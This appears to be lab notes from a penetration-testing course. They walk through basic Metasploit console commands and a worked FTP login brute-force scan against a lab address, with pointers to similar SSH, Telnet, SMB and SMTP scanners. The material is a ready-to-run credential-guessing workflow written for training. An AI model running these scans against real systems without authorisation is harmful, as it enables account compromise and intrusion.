Documents exploit module use, payload configuration, and validation of successful compromise. Reflects practical offensive testing ability.

Metasploit is launched from the terminal using:

```bash
msfconsole
````

---

## 1. Key Metasploit Commands

### Help Menu

Displays core commands and module usage:

```bash
help
```

### Search

Finds modules by name, platform, service, or type:

```bash
search name:apple type:exploit
```

### Module Information

Shows details about a module, including description, platform, targets, required options, and references:

```bash
info exploit/apple_ios/browser/safari_libtiff
```

Metasploit supports full tab completion for all module paths and commands.

---

## 2. Exploit and Auxiliary Module Structure

Modules are organized in a directory hierarchy such as:

```
exploit/<platform>/<service>/<module>
auxiliary/<scanner>/<protocol>/<module>
```

Exploits are ranked by reliability:

* excellent
* great
* good
* normal
* average

Higher-ranked modules are typically more stable and predictable.

---

## 3. Using Modules

### Load a Module

```bash
use <path/to/module>
```

Example:

```bash
use auxiliary/scanner/ftp/ftp_login
```

### Display Module Options

```bash
show options
```

Options marked as **required** must be set before running the module.

### Set Module Options

```bash
set <OPTION> <value>
```

Example:

```bash
set RHOSTS 10.1.16.9
set USER_FILE /media/cdrom0/Lab14/top13-bad-usernames.txt
set PASS_FILE /media/cdrom0/Lab14/top13-bad-passwords.txt
```

USER_FILE and PASS_FILE contain one username or password per line.
USERPASS_FILE can be used for paired credentials in `user:password` format.

### Run the Module

```bash
run
```

After execution, Metasploit reports:

* successful logins
* connection failures
* authentication attempts

---

## 4. Example: FTP Login Scanner

Load the module:

```bash
use auxiliary/scanner/ftp/ftp_login
```

Set required options:

```bash
set RHOSTS 10.1.16.9
set USER_FILE /path/to/usernames.txt
set PASS_FILE /path/to/passwords.txt
```

Verify configuration:

```bash
show options
```

Execute the scan:

```bash
run
```

This module attempts to authenticate to the target FTP service using supplied credentials and outputs any valid username/password pairs.

---

## 5. Other Useful Scanners

Metasploit includes additional authentication scanners that operate similarly:

* SSH

  ```bash
  use auxiliary/scanner/ssh/ssh_login
  ```

* Telnet

  ```bash
  use auxiliary/scanner/telnet/telnet_login
  ```

* SMB

  ```bash
  use auxiliary/scanner/smb/smb_login
  ```

* SMTP

  ```bash
  use auxiliary/scanner/smtp/smtp_enum
  ```

Each scanner requires setting:

* RHOSTS
* USER_FILE and PASS_FILE (or USERPASS_FILE)
* any protocol-specific fields shown in `show options`

---

## Metasploit Workflow

1. Launch msfconsole
2. Search for modules
3. Load a module with `use`
4. Set required options
5. Run the module
6. Review results